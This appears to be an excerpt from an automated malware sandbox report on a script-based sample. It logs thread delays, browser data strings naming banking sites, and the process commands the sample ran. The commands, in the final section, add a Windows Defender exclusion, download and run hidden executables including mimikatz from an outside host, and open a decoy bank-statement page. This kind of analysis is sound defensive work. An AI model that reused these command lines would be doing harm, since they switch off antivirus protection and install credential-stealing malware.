Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4742Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5095Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7532
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 4742 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 5095 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3276Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep count: 2896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8868Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8756Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608Thread sleep count: 6577 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8632Thread sleep count: 686 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9408Thread sleep count: 5051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9636Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9800Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9392Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10076Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 7532 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5464Thread sleep count: 174 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9300Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 3348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Web Data.9.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: Web Data.9.drBinary or memory string: tasks.office.comVMware20,11696501413o
Source: Web Data.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Web Data.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Web Data.9.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: Web Data.9.drBinary or memory string: dev.azure.comVMware20,11696501413j
Source: Web Data.9.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: svchost.exe, 0000000C.00000002.2582886027.000001AC10646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2582962509.000001AC10659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2580709259.000001AC0B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Web Data.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: Web Data.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: Web Data.9.drBinary or memory string: bankofamerica.comVMware20,11696501413x
Source: Web Data.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Web Data.9.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: Web Data.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Web Data.9.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: Web Data.9.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Web Data.9.drBinary or memory string: outlook.office.comVMware20,11696501413s
Source: Web Data.9.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: Web Data.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: Web Data.9.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: Web Data.9.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Web Data.9.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Web Data.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: Web Data.9.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Web Data.9.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: Web Data.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Web Data.9.drBinary or memory string: global block list test formVMware20,11696501413
Source: Web Data.9.drBinary or memory string: outlook.office365.comVMware20,11696501413t
Source: Web Data.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: Web Data.9.drBinary or memory string: interactiveuserers.comVMware20,11696501413
Source: Web Data.9.drBinary or memory string: discord.comVMware20,11696501413f
Source: Web Data.9.drBinary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRARJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRARJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exeJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b control C:\\WinXRAR\\ncpa.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\\WinXRAR\\mimikatz.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.scribd.com/document/806838445/Bank-Statement Jump to behavior
